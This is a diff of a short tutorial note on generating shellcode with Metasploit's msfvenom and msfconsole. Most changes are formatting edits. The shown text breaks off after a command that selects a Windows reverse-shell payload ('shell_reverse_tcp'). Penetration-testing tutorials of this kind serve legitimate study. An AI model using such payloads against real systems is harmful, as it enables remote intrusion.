xapax/security/create_shellcode.md

 # Generate shellcode

-An easy way to generate shellcode is by using msfvenom or msconsole.
+An easy way to generate shellcode is by using `msfvenom` or `msconsole`.
 I mostly see people recommending msfvenom online, but I think msfconsole can be a bit easier to work with.
+But of course it is the same thing, just different interfaces.

 ## Msfconsole

-In msfconsole you have the keyword **generate** that help us generate shellcode.
+In msfconsole you have the keyword `generate` that help us generate shellcode.
 So first we have to select a payload.

 ```
 use payload/windows/shell_reverse_tcp